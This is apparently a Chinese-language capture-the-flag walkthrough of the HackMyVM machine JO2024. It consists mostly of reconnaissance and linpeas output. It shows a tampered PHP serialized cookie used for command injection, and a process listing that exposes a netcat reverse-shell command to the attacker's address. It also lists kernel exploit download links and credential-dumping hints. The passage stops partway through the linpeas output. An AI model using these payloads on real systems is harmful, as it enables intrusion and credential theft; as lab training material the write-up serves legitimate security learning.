HackMyVM JO2024

┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l

Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:14       (Unknown: locally administered)
192.168.56.100  08:00:27:06:49:ab       PCS Systemtechnik GmbH
192.168.56.106  08:00:27:1f:07:53       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 3 responded
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.106 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 19:23 EST
Nmap scan report for 192.168.56.106
Host is up (0.00054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-title: Paris 2024 Olympic Games
|_http-server-header: Apache/2.4.61 (Debian)
MAC Address: 08:00:27:1F:07:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.99 seconds
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# whatweb -v http://192.168.56.106/  
WhatWeb report for http://192.168.56.106/
Status    : 200 OK
Title     : Paris 2024 Olympic Games
IP        : 192.168.56.106
Country   : RESERVED, ZZ

Summary   : Apache[2.4.61], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.61 (Debian)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.61 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Debian Linux
        String       : Apache/2.4.61 (Debian) (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Thu, 19 Dec 2024 00:23:48 GMT
        Server: Apache/2.4.61 (Debian)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2613
        Connection: close
        Content-Type: text/html; charset=UTF-8

                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.106/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.56.106/__24-12-18_19-23-56.txt

Target: http://192.168.56.106/

[19:23:56] Starting: 
[19:23:58] 403 -  279B  - /.ht_wsr.txt
[19:23:58] 403 -  279B  - /.htaccess.bak1
[19:23:58] 403 -  279B  - /.htaccess.sample
[19:23:58] 403 -  279B  - /.htaccess.orig
[19:23:58] 403 -  279B  - /.htaccess_orig
[19:23:58] 403 -  279B  - /.htaccessOLD2
[19:23:58] 403 -  279B  - /.htm
[19:23:58] 403 -  279B  - /.htaccess_extra
[19:23:58] 403 -  279B  - /.html
[19:23:58] 403 -  279B  - /.htaccess.save
[19:23:58] 403 -  279B  - /.htaccessOLD
[19:23:58] 403 -  279B  - /.htaccessBAK
[19:23:58] 403 -  279B  - /.htaccess_sc
[19:23:58] 403 -  279B  - /.htpasswds
[19:23:58] 403 -  279B  - /.htpasswd_test
[19:23:58] 403 -  279B  - /.httr-oauth
[19:23:59] 403 -  279B  - /.php
[19:24:19] 301 -  314B  - /img  ->  http://192.168.56.106/img/
[19:24:29] 403 -  279B  - /server-status
[19:24:29] 403 -  279B  - /server-status/

Task Completed

到这就下不去了，看了wp发现是字典问题

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak,zip -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,php,html,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 7812]
/preferences.php      (Status: 200) [Size: 3163]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================
                   

访问后显示cookie怎么怎么

%3D改成0后解码

得到php的序列化代码

O:15:"UserPreferences":2:{s:8:"language";s:2:"fr";s:15:"backgroundColor";s:4:"#ddd";}

尝试改成命令执行

O:15:"UserPreferences":2:{s:8:"language";s:6:"whoami";s:15:"backgroundColor";s:4:"#ddd";}

成功执行

尝试反弹shell

成功接到shell

传个linpeas.sh和pspy64看看

www-data@jo2024:/tmp$ ./linpeas.sh
./linpeas.sh



                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @hacktricks_live                        |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          LinPEAS-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               ╚═══════════════════╝
OS: Linux version 6.1.0-23-amd64 (debian-kernel@lists.debian.org) (gcc-12 (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: jo2024.hmv

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h)


Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 6.1.0-23-amd64 (debian-kernel@lists.debian.org) (gcc-12 (Debian 12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15)
Distributor ID: Debian
Description:    Debian GNU/Linux 12 (bookworm)
Release:        12
Codename:       bookworm

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.9.13p3


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Date & uptime
Thu Dec 19 01:45:30 CET 2024
 01:45:30 up 24 min,  1 user,  load average: 0.15, 0.12, 0.31

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=8c117519-d2dc-4c6c-a162-a84e87b65ce8 /               ext4    errors=remount-ro 0       1
UUID=4684e255-2ee3-4e21-900d-4c77798985ea none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5

╔══════════╣ Environment
╚ Any private information inside environment variables?
SHLVL=2
OLDPWD=/
LC_CTYPE=C.UTF-8
APACHE_RUN_DIR=/var/run/apache2
SYSTEMD_EXEC_PID=554
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:14909
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=9dfab6a8d8dd492ca5453d5d54429c20
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (oracle)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
./linpeas.sh: 2214: check_aliyun_ecs: not found
grep: /etc/cloud/cloud.cfg: No such file or directory
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
═╣ Aliyun ECS? .......................... 
═╣ Tencent CVM? ......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root           1  0.0  0.3 102108 12284 ?        Ss   01:21   0:00 /sbin/init splash
root         233  0.0  0.2  33132 11732 ?        Ss   01:21   0:00 /lib/systemd/systemd-journald
root         257  0.0  0.1  27140  6616 ?        Ss   01:21   0:00 /lib/systemd/systemd-udevd
systemd+     276  0.0  0.1  90068  6580 ?        Ssl  01:21   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         430  0.0  0.0   5868  3668 ?        Ss   01:21   0:00 dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         506  0.0  0.0   6608  2712 ?        Ss   01:21   0:00 /usr/sbin/cron -f
message+     507  0.0  0.1   9612  5384 ?        Ss   01:21   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         508  0.0  0.0   9188  3972 ?        Ss   01:21   0:00 /usr/sbin/dundee -n
root         510  0.0  0.1  11452  6144 ?        Ss   01:21   0:00 /usr/sbin/ofonod -n
root         511  0.0  0.1  25188  7928 ?        Ss   01:21   0:00 /lib/systemd/systemd-logind
root         515  0.0  0.3 394828 14800 ?        Ssl  01:21   0:00 /usr/libexec/udisks2/udisksd
root         520  0.0  0.1  16996  7284 ?        Ss   01:21   0:00 /usr/sbin/connmand -n
root         522  0.0  0.1  16520  5840 ?        Ss   01:21   0:00 /sbin/wpa_supplicant -u -s -O DIR=/run/wpa_supplicant GROUP=netdev
polkitd      565  0.0  0.2 309356  9180 ?        Ssl  01:21   0:00 /usr/lib/polkit-1/polkitd --no-debug
root         573  0.0  0.1 308716  7584 ?        Ssl  01:21   0:00 /usr/sbin/lightdm
root         635  0.0  2.1 355436 87756 ?        Sl   01:21   0:00  _ /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
root         717  0.0  0.1 162508  7796 ?        Sl   01:21   0:00  _ lightdm --session-child 15 18
vanity       740  0.0  0.3 250424 15764 ?        Ssl  01:21   0:00      _ /usr/bin/lxsession -s LXDE -e LXDE
vanity       803  0.0  0.0   7672   776 ?        Ss   01:21   0:00          _ /usr/bin/ssh-agent x-session-manager
vanity       827  0.0  0.6 240828 24908 ?        S    01:21   0:00          _ openbox --config-file /home/vanity/.config/openbox/lxde-rc.xml
vanity       830  0.0  0.3 179100 14332 ?        Sl   01:21   0:00          _ lxpolkit
vanity       832  0.0  1.0 960880 43648 ?        Sl   01:21   0:00          _ lxpanel --profile LXDE
vanity       839  0.0  0.9 500044 39048 ?        Sl   01:21   0:00          _ pcmanfm --desktop --profile LXDE
vanity       840  0.0  0.0   6624  3104 ?        S    01:21   0:00          _ xscreensaver -no-splash
vanity       851  0.0  0.0   9632  3724 ?        S    01:21   0:00              _ xscreensaver-systemd
root         634  0.0  0.0   5872  1024 tty1     Ss+  01:21   0:00 /sbin/agetty -o -p -- u --noclear - linux
root         654  0.0  0.5 204196 21912 ?        Ss   01:21   0:00 /usr/sbin/apache2 -k start
www-data     705  0.5  0.4 205124 16236 ?        S    01:21   0:08  _ /usr/sbin/apache2 -k start
www-data    1257  0.6  0.4 205124 16224 ?        S    01:23   0:08  _ /usr/sbin/apache2 -k start
www-data    1260  0.6  0.3 205124 15668 ?        S    01:23   0:08  _ /usr/sbin/apache2 -k start
www-data    1263  0.6  0.3 205116 15788 ?        S    01:24   0:08  _ /usr/sbin/apache2 -k start
www-data    1357  0.6  0.4 205116 17860 ?        S    01:24   0:08  _ /usr/sbin/apache2 -k start
www-data    1358  0.6  0.4 205132 16092 ?        S    01:24   0:08  _ /usr/sbin/apache2 -k start
www-data    2683  0.0  0.0   2576   900 ?        S    01:38   0:00  |   _ sh -c nc -e /bin/bash 192.168.56.102 1234
www-data    2684  0.0  0.0   3924  2896 ?        S    01:38   0:00  |       _ bash
www-data    2686  0.0  0.2  17232  9476 ?        S    01:38   0:00  |           _ python3 -c import pty;pty.spawn("/bin/bash")
www-data    2687  0.0  0.0   7544  3716 pts/0    Ss   01:38   0:00  |               _ /bin/bash
www-data    3479  0.4  0.0   3304  2368 pts/0    S+   01:45   0:00  |                   _ /bin/sh ./linpeas.sh
www-data    6391  0.0  0.0   3304   848 pts/0    S+   01:45   0:00  |                       _ /bin/sh ./linpeas.sh
www-data    6395  0.0  0.1  11460  4236 pts/0    R+   01:45   0:00  |                       |   _ ps fauxwww
www-data    6394  0.0  0.0   3304   848 pts/0    S+   01:45   0:00  |                       _ /bin/sh ./linpeas.sh
www-data    1558  0.6  0.4 205116 16396 ?        S    01:26   0:07  _ /usr/sbin/apache2 -k start
www-data    1560  0.7  0.3 205116 15780 ?        S    01:26   0:07  _ /usr/sbin/apache2 -k start
www-data    1561  0.7  0.3 204852 12420 ?        S    01:26   0:07  _ /usr/sbin/apache2 -k start
www-data    1562  0.7  0.3 204852 12420 ?        S    01:26   0:08  _ /usr/sbin/apache2 -k start
vanity       722  0.0  0.2  19096 10828 ?        Ss   01:21   0:00 /lib/systemd/systemd --user
vanity       723  0.0  0.0 103332  3192 ?        S    01:21   0:00  _ (sd-pam)
vanity       738  0.0  0.7 654256 31328 ?        S<sl 01:21   0:00  _ /usr/bin/pulseaudio --daemonize=no --log-target=journal
vanity       750  0.0  0.1   9388  5080 ?        Ss   01:21   0:00  _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
vanity       814  0.0  0.2 237512  9888 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfsd
vanity      1028  0.0  0.3 459084 12520 ?        Sl   01:21   0:00  |   _ /usr/libexec/gvfsd-trash --spawner :1.5 /org/gtk/gvfs/exec_spaw/0
vanity       823  0.0  0.1 380372  6252 ?        Sl   01:21   0:00  _ /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
vanity       920  0.0  0.3 537540 15888 ?        Ssl  01:21   0:00  _ /usr/libexec/xdg-desktop-portal
vanity       921  0.0  0.1 156320  5652 ?        Ssl  01:21   0:00  _ /usr/libexec/dconf-service
vanity       930  0.0  0.2 460344 11260 ?        Ssl  01:21   0:00  _ /usr/libexec/xdg-document-portal
root         940  0.0  0.0   2480   984 ?        Ss   01:21   0:00  |   _ fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
vanity       934  0.0  0.1 236700  7708 ?        Ssl  01:21   0:00  _ /usr/libexec/xdg-permission-store
vanity       943  0.0  0.5 335348 20472 ?        Ssl  01:21   0:00  _ /usr/libexec/xdg-desktop-portal-gtk
vanity       959  0.0  0.2 239620 10232 ?        Sl   01:21   0:00  _ /usr/bin/gnome-keyring-daemon --start --foreground --components=secrets
vanity       961  0.0  0.2 239752 11716 ?        Ssl  01:21   0:00  _ /usr/bin/gnome-keyring-daemon --foreground --components=pkcs11,secrets --control-directory=/run/user/1000/keyring
vanity       991  0.0  0.3 351372 13572 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfs-udisks2-volume-monitor
vanity      1005  0.0  0.2 234308  8924 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfs-gphoto2-volume-monitor
vanity      1009  0.0  0.2 233520 10308 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfs-goa-volume-monitor
vanity      1013  0.0  0.2 233352  8408 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfs-mtp-volume-monitor
vanity      1017  0.0  0.2 312408  9952 ?        Ssl  01:21   0:00  _ /usr/libexec/gvfs-afc-volume-monitor
rtkit        756  0.0  0.0  22700  1532 ?        SNsl 01:21   0:00 /usr/libexec/rtkit-daemon
  └─(Caps) 0x0000000000800004=cap_dac_read_search,cap_sys_nice
vanity       847  0.0  0.0   7672   772 ?        Ss   01:21   0:00 /usr/bin/ssh-agent -s
vanity       848  0.0  0.5 180908 21016 ?        Sl   01:21   0:00 parcellite
vanity       852  0.0  2.6 719408 105072 ?       Sl   01:21   0:00 /usr/bin/mousepad /home/vanity/creds/credentials.txt
vanity       855  0.0  2.0 566996 83756 ?        Sl   01:21   0:00 xdg-user-dirs-gtk-update
vanity       872  0.0  0.2 311228  9748 ?        Sl   01:21   0:00 /usr/libexec/at-spi-bus-launcher --launch-immediately
vanity       891  0.0  0.1   8988  4380 ?        S    01:21   0:00  _ /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_0
vanity       915  0.0  0.1 156900  5684 ?        Sl   01:21   0:00 /usr/lib/menu-cache/menu-cached /run/user/1000/menu-cached-:0
vanity       951  0.0  0.2 164388 10180 ?        Sl   01:21   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session


╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon process found (dump creds from memory as root)
lightdm process found (dump creds from memory as root)
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)

╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
Proc 276 with ppid 1 is run by user systemd-timesync but the ppid user is root
Proc 507 with ppid 1 is run by user messagebus but the ppid user is root
Proc 565 with ppid 1 is run by user polkitd but the ppid user is root
Proc 705 with ppid 654 is run by user www-data but the ppid user is root
Proc 722 with ppid 1 is run by user vanity but the ppid user is root
Proc 740 with ppid 717 is run by user vanity but the ppid user is root
Proc 756 with ppid 1 is run by user rtkit but the ppid user is root
Proc 847 with ppid 1 is run by user vanity but the ppid user is root
Proc 848 with ppid 1 is run by user vanity but the ppid user is root
Proc 852 with ppid 1 is run by user vanity but the ppid user is root
Proc 855 with ppid 1 is run by user vanity but the ppid user is root
Proc 872 with ppid 1 is run by user vanity but the ppid user is root
Proc 915 with ppid 1 is run by user vanity but the ppid user is root
Proc 951 with ppid 1 is run by user vanity but the ppid user is root
Proc 1257 with ppid 654 is run by user www-data but the ppid user is root
Proc 1260 with ppid 654 is run by user www-data but the ppid user is root
Proc 1263 with ppid 654 is run by user www-data but the ppid user is root
Proc 1357 with ppid 654 is run by user www-data but the ppid user is root
Proc 1358 with ppid 654 is run by user www-data but the ppid user is root
Proc 1558 with ppid 654 is run by user www-data but the ppid user is root
Proc 1560 with ppid 654 is run by user www-data but the ppid user is root
Proc 1561 with ppid 654 is run by user www-data but the ppid user is root
Proc 1562 with ppid 654 is run by user www-data but the ppid user is root

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND    PID  TID TASKCMD               USER   FD      TYPE DEVICE SIZE/OFF    NODE NAME

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root    1042 Mar  2  2023 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x   2 root root 4096 Jul 28 10:41 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder
-rw-r--r--   1 root root  285 Jan 10  2023 anacron
-rw-r--r--   1 root root  201 Mar  5  2023 e2scrub_all
-rw-r--r--   1 root root  712 Jul 13  2022 php

/etc/cron.daily:
total 36
drwxr-xr-x   2 root root 4096 Jul 28 10:42 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder
-rwxr-xr-x   1 root root  311 Jan 10  2023 0anacron
-rwxr-xr-x   1 root root  539 Jul  1 14:57 apache2
-rwxr-xr-x   1 root root 1478 May 25  2023 apt-compat
-rwxr-xr-x   1 root root  123 Mar 27  2023 dpkg
-rwxr-xr-x   1 root root  377 Dec 14  2022 logrotate
-rwxr-xr-x   1 root root 1395 Mar 12  2023 man-db

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Mar  9  2024 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder

/etc/cron.monthly:
total 16
drwxr-xr-x   2 root root 4096 Mar  9  2024 .
drwxr-xr-x 107 root root 4096 Jul 29 16:15 ..
-rw-r--r--   1 root root  102 Mar  2  2023 .placeholder
